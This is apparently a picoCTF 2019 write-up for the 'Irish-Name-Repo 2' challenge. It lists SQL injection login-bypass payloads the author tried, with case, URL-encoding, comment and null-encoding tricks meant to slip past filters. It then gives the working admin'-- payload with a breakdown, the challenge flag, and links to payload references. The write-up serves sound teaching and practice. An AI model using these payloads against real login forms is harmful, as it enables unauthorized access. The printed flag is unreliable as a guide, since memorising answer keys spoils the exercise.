Coming from this challenge's prequel Irish-Name-Repo 1 - picoCTF '19, I was hellbent thinking I had to encode the password parameter. I tried several SQL injection variations, including:
- `' oR 1=1 --` - case manipulation
- `%27%20%20%6f%72%20%31%3d%31%20%2d%2d` - URL encoding
- `'/**/ or /**/ 1=1 /**/ --` - Comment obfuscation
- `00%' or 1=1 --` - null hex encoding
...and other combinations but to no avail. Once I shifted my attention, the solution became straightforward.
STEPS TO SOLUTION
Use `admin'--` in the username parameter.
Breakdown:
- `admin` - value for username query.
- `'` - closes the input string.
- `--` - comments out the remaining query.
FLAG: picoCTF{m0R3_SQL_plz_fa983901}
PWNSOME REFERENCES
https://portswigger.net/support/sql-injection-bypassing-common-filters
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

